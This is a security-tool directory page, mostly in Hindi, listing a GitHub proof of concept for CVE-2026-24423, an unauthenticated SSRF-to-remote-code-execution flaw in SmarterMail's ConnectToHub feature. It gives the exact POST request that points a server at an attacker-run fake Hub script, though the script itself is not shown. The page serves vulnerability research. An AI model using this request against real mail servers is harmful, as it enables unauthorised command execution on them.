Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24423 — CVE-2026-24423 के लिए प्रजनन स्क्रिप्ट, जो SmarterMail ConnectToHub में एक ट्रस्ट सीमा उल्लंघन है, जिससे SSRF और संभावित रिमोट कोड निष्पादन होता है। इसमें एक सिम्युलेटेड Hub सर्वर और कमजोर API को ट्रिगर करने के निर्देश शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/aavamin/cve-2026-24423
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubaavamin/cve-2026-24423

CVE-2026-24423

CVE-2026-24423 के लिए प्रजनन स्क्रिप्ट, जो SmarterMail ConnectToHub में एक ट्रस्ट सीमा उल्लंघन है, जिससे SSRF और संभावित रिमोट कोड निष्पादन होता है। इसमें एक सिम्युलेटेड Hub सर्वर और कमजोर API को ट्रिगर करने के निर्देश शामिल हैं।

रिपॉजिटरी देखें
81178 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24423

# CVE-2026-24423 – पुनरुत्पादन

> ⚠️ **केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए / For security research and authorized testing only**


## परिचय (Overview)

यह प्रोजेक्ट **CVE-2026-24423** भेद्यता को पुनरुत्पादित करने के लिए है।  
यह भेद्यता **SmarterMail ConnectToHub** सुविधा में मौजूद है, जिसका मूल कारण है:

- प्रशासनिक स्तर का इंटरफ़ेस प्रमाणीकरण के बिना है  
- सर्वर उपयोगकर्ता द्वारा निर्दिष्ट Hub से सक्रिय रूप से कनेक्ट होता है (SSRF)  
- बाहरी Hub से लौटाया गया डेटा सीधे स्थानीय सिस्टम-स्तरीय संचालन में उपयोग किया जाता है  

यह भेद्यता **डिज़ाइन-स्तरीय विश्वास सीमा उल्लंघन (Trust Boundary Violation)** की श्रेणी में आती है, जो अंततः दूरस्थ कोड निष्पादन का कारण बन सकती है।

यह रिपॉजिटरी केवल **भेद्यता सत्यापन और तकनीकी अनुसंधान** के लिए है, शोषण/हथियारीकरण के लिए नहीं।

उपयोग विधि (Usage)

1️⃣ Hub सिमुलेशन सेवा प्रारंभ करें

Start Hub Simulation Server

python3 cve-2026-24423.py

यह स्क्रिप्ट निम्न कार्य करेगी:

  • 80 पोर्ट पर सुनना
  • SmarterMail Hub इंटरफ़ेस का अनुकरण करना
  • SystemMount कॉन्फ़िगरेशन युक्त JSON प्रतिक्रिया लौटाना

2️⃣ भेद्यता इंटरफ़ेस ट्रिगर करें

Trigger the Vulnerable API

Yakit या Burp Suite का उपयोग करके अनुरोध भेजें:

POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json

{
  "hubAddress": "http://ip",
  "oneTimePassword": "test",
  "nodeName": "victim"
}

इस इंटरफ़ेस के लिए प्रमाणीकरण की आवश्यकता नहीं है No authentication is required.


3️⃣ पुनरुत्पादन विफलता का समाधान

Troubleshooting

यदि भेद्यता पुनरुत्पादन विफल हो जाता है:

  • कृपया cve-2026-24423.py में MountPath पैरामीटर संशोधित करें

4️⃣ पुनरुत्पादन परिणाम

Result

जब भेद्यता सफलतापूर्वक ट्रिगर होती है, तो SmarterMail Hub से लौटाए गए डेटा को पार्स करेगा, डिफ़ॉल्ट कोड केवल whoami कमांड निष्पादित करता है।

उदाहरण स्क्रीनशॉट / Example:

result


आभार (Credit)

यह प्रोजेक्ट ChatGPT द्वारा पूरा किया गया है।

टूल डाउनलोड करें